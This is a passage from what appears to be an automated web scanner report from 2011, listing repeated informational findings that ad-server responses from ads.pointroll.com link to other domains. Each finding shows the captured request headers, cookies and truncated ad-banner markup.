Date: Sun, 24 Apr 2011 16:48:43 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-27DD-82BB-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:11|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:11|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:5|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:5|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:5|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=27;1=2;2=1;s=376;g=172;m=34;w=51;i=27;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-27DD-82BB-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.65. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:47|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=10%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=10%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.22177061496742045 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-75D9-0597-1209-8C0000510101; PRca=|AKKi*9708:8|AKEA*263:1|#; PRcp=|AKKiAC6a:8|AKEAAAEP:1|#; PRpl=|FQue:3|FQud:5|FFCo:1|#; PRcr=|GKiM:3|GKiO:5|GEHc:1|#; PRpc=|FQueGKiM:3|FQudGKiO:5|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:47:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2481
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-D3D9-E1C2-1209-8C0000530101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:9|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:9|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:3|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:3|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:3|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931285;n=809;x=2304;c=809001050,809001050;g=172;i=10;1=2;2=1;s=376;g=172;m=34;w=51;i=10;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471150&c=1&i=ACA10400-D3D9-E1C2-1209-8C0000530101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256655%26adid=1471150'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg?PRAd=1471150&PRCID=1471150&PRplcmt=
...[SNIP]...

23.66. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:47|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931287%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=8%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=8%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.7766469475968933 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-26D6-1D91-1209-8C0000530101; PRca=|AKKi*9708:3|AKEA*263:1|#; PRcp=|AKKiAC6a:3|AKEAAAEP:1|#; PRpl=|FQud:3|FFCo:1|#; PRcr=|GKiO:3|GEHc:1|#; PRpc=|FQudGKiO:3|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:47:18 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1831
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-11D8-970D-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:4|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:4|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:1|FQud:3|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:1|GKiO:3|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:1|FQudGKiO:3|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931287;n=809;x=1792;c=809001050,809001050;g=172;i=8;1=2;2=1;s=376;g=172;m=34;w=51;i=8;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-11D8-970D-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.67. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=36%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=36%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.694746030923704 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-1CDE-DE1A-1209-8C0000510101; PRca=|AKKi*9708:14|AKEA*263:1|#; PRcp=|AKKiAC6a:14|AKEAAAEP:1|#; PRpl=|FQue:8|FQud:6|FFCo:1|#; PRcr=|GKiM:8|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:8|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:49:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-CEDF-B5DD-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:15|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:15|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:9|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:9|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:9|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=36;1=2;2=1;s=376;g=172;m=34;w=51;i=36;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-CEDF-B5DD-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.68. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256655V79920110413152406&flash=0&time=0|11:47|-5&redir=http://yads.zedo.com/ads2/c%3Fa=931285%3Bn=809%3Bx=2304%3Bc=809001050,809001050%3Bg=172%3Bi=10%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=10%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.16071350762080377 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-75D9-0597-1209-8C0000510101; PRca=|AKKi*9708:8|AKEA*263:1|#; PRcp=|AKKiAC6a:8|AKEAAAEP:1|#; PRpl=|FQue:3|FQud:5|FFCo:1|#; PRcr=|GKiM:3|GKiO:5|GEHc:1|#; PRpc=|FQueGKiM:3|FQudGKiO:5|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:47:47 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 2481
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-C8D9-3038-1209-8C0000530101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:9|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:9|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:3|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:3|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:3|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=931285;n=809;x=2304;c=809001050,809001050;g=172;i=10;1=2;2=1;s=376;g=172;m=34;w=51;i=10;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471150&c=1&i=ACA10400-C8D9-3038-1209-8C0000530101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256655%26adid=1471150'><img border=0 width='300' height='250' style='width:300px;height:250px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861122/Premium_300x250_Dft.jpg?PRAd=1471150&PRCID=1471150&PRplcmt=
...[SNIP]...

23.69. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:48|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=30%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=30%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.41853538638839044 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-82DD-7B42-1209-8C0000510101; PRca=|AKKi*9708:12|AKEA*263:1|#; PRcp=|AKKiAC6a:12|AKEAAAEP:1|#; PRpl=|FQue:6|FQud:6|FFCo:1|#; PRcr=|GKiM:6|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:6|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:48:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-CCDD-8ED5-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:13|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:13|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:7|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:7|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:7|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=30;1=2;2=1;s=376;g=172;m=34;w=51;i=30;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-CCDD-8ED5-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.70. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:49|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=40%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=40%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.47031282034556226 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-A2E0-3672-1209-8C0000510101; PRca=|AKKi*9708:16|AKEA*263:1|#; PRcp=|AKKiAC6a:16|AKEAAAEP:1|#; PRpl=|FQue:10|FQud:6|FFCo:1|#; PRcr=|GKiM:10|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:10|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:49:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-E3E0-6F13-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:17|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:17|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:11|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:11|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:11|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=40;1=2;2=1;s=376;g=172;m=34;w=51;i=40;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-E3E0-6F13-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.71. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1256656O57720110413152406&flash=0&time=0|11:48|-5&redir=http://yads.zedo.com/ads2/c%3Fa=935450%3Bn=809%3Bx=1792%3Bc=809001050,809001050%3Bg=172%3Bi=24%3B1=2%3B2=1%3Bs=376%3Bg=172%3Bm=34%3Bw=51%3Bi=24%3Bu=9lO0TcGt89btIYJEUz5hJCkQ~042411%3Bk=$CTURL$&r=0.4819145017135264 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ads.pointroll.com
Cookie: PRbu=EndWiNPUY; PRgo=BAA; PRID=0BF6CA2A-ACDA-40B6-B452-CC8B2E882F48; PRvt=CBJcgEndWiNPUY!AgBBe; PRimp=ACA10400-D3D9-E1C2-1209-8C0000530101; PRca=|AKKi*9708:9|AKEA*263:1|#; PRcp=|AKKiAC6a:9|AKEAAAEP:1|#; PRpl=|FQue:3|FQud:6|FFCo:1|#; PRcr=|GKiM:3|GKiO:6|GEHc:1|#; PRpc=|FQueGKiM:3|FQudGKiO:6|FFCoGEHc:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 24 Apr 2011 16:48:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 1833
Set-Cookie:PRgo=BAA;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=ACA10400-B9DC-076C-1209-8C0000510101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKKi*9708:10|AKEA*263:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKKiAC6a:10|AKEAAAEP:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FQue:4|FQud:6|FFCo:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKiM:4|GKiO:6|GEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FQueGKiM:4|FQudGKiO:6|FFCoGEHc:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://yads.zedo.com/ads2/c?a=935450;n=809;x=1792;c=809001050,809001050;g=172;i=24;1=2;2=1;s=376;g=172;m=34;w=51;i=24;u=9lO0TcGt89btIYJEUz5hJCkQ~042411;k=http://clk.pointroll.com/bc/?a=1471148&c=1&i=ACA10400-B9DC-076C-1209-8C0000510101&clickurl=http://clients.pointroll.com/apps/CouponsInc/coupon.ashx%3Fcollect=723593291%26plcmt=1256656%26adid=1471148'><img border=0 width='160' height='600' style='width:160px;height:600px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Purina/861124/Premium_160x600_Dft.jpg?PRAd=1471148&PRCID=1471148&PRplcmt=
...[SNIP]...

23.72. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

